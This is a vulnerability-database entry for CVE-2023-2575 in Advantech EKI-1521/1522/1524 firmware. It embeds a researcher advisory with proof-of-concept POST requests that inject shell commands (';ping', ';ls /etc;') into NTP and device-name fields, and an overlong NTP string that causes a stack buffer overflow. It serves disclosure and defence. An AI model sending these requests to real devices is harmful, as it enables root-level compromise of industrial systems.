ID

VAR-202305-0474


CVE

CVE-2023-2575


TITLE

Out-of-bounds write vulnerability in multiple Advantech products

Trust: 0.8

sources: JVNDB: JVNDB-2023-009954

DESCRIPTION

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence." Source: https://www.advantech.com/en/about Vulnerable versions ------------------------------------------------------------------------------- EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. 2) Buffer Overflow (CVE-2023-2575) The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background: 1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94. 1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94. 2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 *** Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...] The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update the product to the latest available firmware version. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023

Trust: 1.8

sources: NVD: CVE-2023-2575 // JVNDB: JVNDB-2023-009954 // VULMON: CVE-2023-2575 // PACKETSTORM: 172307

AFFECTED PRODUCTS

vendor:advantechmodel:eki-1522scope:lteversion:1.21

Trust: 1.0

vendor:advantechmodel:eki-1524scope:lteversion:1.21

Trust: 1.0

vendor:advantechmodel:eki-1521scope:lteversion:1.21

Trust: 1.0

vendor:アドバンテック株式会社model:eki-1521scope: - version: -

Trust: 0.8

vendor:アドバンテック株式会社model:eki-1522scope: - version: -

Trust: 0.8

vendor:アドバンテック株式会社model:eki-1524scope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2023-009954 // NVD: CVE-2023-2575

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2023-2575
value: HIGH

Trust: 1.0

office@cyberdanube.com: CVE-2023-2575
value: HIGH

Trust: 1.0

NVD: CVE-2023-2575
value: HIGH

Trust: 0.8

CNNVD: CNNVD-202305-381
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2023-2575
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 2.0

NVD: CVE-2023-2575
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: JVNDB: JVNDB-2023-009954 // CNNVD: CNNVD-202305-381 // NVD: CVE-2023-2575 // NVD: CVE-2023-2575

PROBLEMTYPE DATA

problemtype:CWE-121

Trust: 1.0

problemtype:CWE-787

Trust: 1.0

problemtype:Out-of-bounds writing (CWE-787) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2023-009954 // NVD: CVE-2023-2575

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202305-381

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-202305-381

PATCH

title:Advantech Buffer error vulnerability fixurl:http://123.124.177.30/web/xxk/bdxqById.tag?id=237364

Trust: 0.6

sources: CNNVD: CNNVD-202305-381

EXTERNAL IDS

db:NVDid:CVE-2023-2575

Trust: 3.4

db:PACKETSTORMid:172307

Trust: 2.5

db:JVNDBid:JVNDB-2023-009954

Trust: 0.8

db:CXSECURITYid:WLB-2023050038

Trust: 0.6

db:CNNVDid:CNNVD-202305-381

Trust: 0.6

db:VULMONid:CVE-2023-2575

Trust: 0.1

sources: VULMON: CVE-2023-2575 // JVNDB: JVNDB-2023-009954 // PACKETSTORM: 172307 // CNNVD: CNNVD-202305-381 // NVD: CVE-2023-2575

REFERENCES

url:https://www.advantech.com/en/support/details/firmware?id=1-1j9bed3

Trust: 2.5

url:https://www.advantech.com/en/support/details/firmware?id=1-1j9bect

Trust: 2.5

url:https://www.advantech.com/en/support/details/firmware?id=1-1j9bebl

Trust: 2.5

url:http://packetstormsecurity.com/files/172307/advantech-eki-15xx-series-command-injection-buffer-overflow.html

Trust: 2.4

url:http://seclists.org/fulldisclosure/2023/may/4

Trust: 2.4

url:https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2023-2575

Trust: 0.9

url:https://cxsecurity.com/issue/wlb-2023050038

Trust: 0.6

url:https://cxsecurity.com/cveshow/cve-2023-2575/

Trust: 0.6

url:https://nvd.nist.gov

Trust: 0.1

url:http://172.16.0.100/cgi-bin/index.cgi

Trust: 0.1

url:http://172.16.0.97

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2023-2573

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2023-2574

Trust: 0.1

url:https://www.advantech.com/en/about

Trust: 0.1

url:https://advantech.com

Trust: 0.1

url:https://medusa.cyberdanube.com).

Trust: 0.1

url:https://twitter.com/cyberdanube

Trust: 0.1

url:http://172.16.0.100

Trust: 0.1

url:https://www.cyberdanube.com

Trust: 0.1

url:http://172.16.0.97/cgi-bin/index.cgi

Trust: 0.1

sources: VULMON: CVE-2023-2575 // JVNDB: JVNDB-2023-009954 // PACKETSTORM: 172307 // CNNVD: CNNVD-202305-381 // NVD: CVE-2023-2575

CREDITS

T. Weber

Trust: 0.6

sources: CNNVD: CNNVD-202305-381

SOURCES

db:VULMONid:CVE-2023-2575
db:JVNDBid:JVNDB-2023-009954
db:PACKETSTORMid:172307
db:CNNVDid:CNNVD-202305-381
db:NVDid:CVE-2023-2575

LAST UPDATE DATE

2024-08-14T14:17:13.845000+00:00


SOURCES UPDATE DATE

db:VULMONid:CVE-2023-2575date:2023-05-08T00:00:00
db:JVNDBid:JVNDB-2023-009954date:2023-12-07T04:51:00
db:CNNVDid:CNNVD-202305-381date:2023-05-15T00:00:00
db:NVDid:CVE-2023-2575date:2023-05-12T18:15:09.827

SOURCES RELEASE DATE

db:VULMONid:CVE-2023-2575date:2023-05-08T00:00:00
db:JVNDBid:JVNDB-2023-009954date:2023-12-07T00:00:00
db:PACKETSTORMid:172307date:2023-05-12T16:24:23
db:CNNVDid:CNNVD-202305-381date:2023-05-08T00:00:00
db:NVDid:CVE-2023-2575date:2023-05-08T13:15:09.847